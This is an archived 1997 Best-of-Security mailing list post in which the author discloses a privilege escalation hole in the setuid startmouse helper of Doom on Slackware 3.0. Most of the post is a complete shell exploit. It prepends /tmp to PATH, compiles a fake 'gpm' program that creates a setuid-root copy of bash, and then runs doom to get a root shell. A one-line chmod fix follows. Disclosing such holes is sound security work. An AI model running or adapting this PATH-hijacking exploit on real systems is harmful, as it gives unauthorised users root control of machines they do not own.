[49] in Best-of-Security

home help back first fref pref prev next nref lref last post

BoS: Security hole in Slack (startmouse - Doom) + exploit

daemon@ATHENA.MIT.EDU (Cristian VARVAS)
Thu Feb 27 07:32:15 1997

Date: Wed, 26 Feb 1997 12:04:05 +0200 (EET)
From: Cristian VARVAS <jolly@ana.utcluj.ro>
Cc: admin@utcluj.ro
In-Reply-To: <Pine.GSO.3.95.970222170637.18883A-100000@sundy.cs.pub.ro>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net

	I have found a security hole in startmouse on Doom (Slack 3.0).
	I made an exploit. My exploit works if you have
/usr/games/doom/startmouse with suid-flag.

---begin

#!/bin/sh
export PATH=/tmp:$PATH
#			(c)1997 by jolly@utcluj.ro
#
echo '#include<stdio.h>                                         '>>/tmp/gpm.c
echo 'void main()                                               '>>/tmp/gpm.c
echo '{                                                         '>>/tmp/gpm.c
echo '   seteuid(0,0);                                          '>>/tmp/gpm.c
echo '   system("cp /bin/bash /tmp/setuid.bash");               '>>/tmp/gpm.c
echo '   system("chmod 4755 /tmp/setuid.bash");                 '>>/tmp/gpm.c
echo '}                                                         '>>/tmp/gpm.c
#
cc -o /tmp/gpm /tmp/gpm.c
/usr/bin/doom
rm /tmp/gpm.c /tmp/gpm
sleep 5
/tmp/setuid.bash

---end
	Solution: chmod 755 /usr/games/doom/startmouse

--------------------------------------------------------------
Technical University            Cristian VARVAS <cvarvas@utcluj.ro)
        of                      Str. M. Viteazu, Nr. 21, Ap. 50
   Cluj-Napoca                  RO 2400 SIBIU
Data Communication Center       tel +40(0)69-420418,fax 213901
--------------------------------------------------------------
home help back first fref pref prev next nref lref last post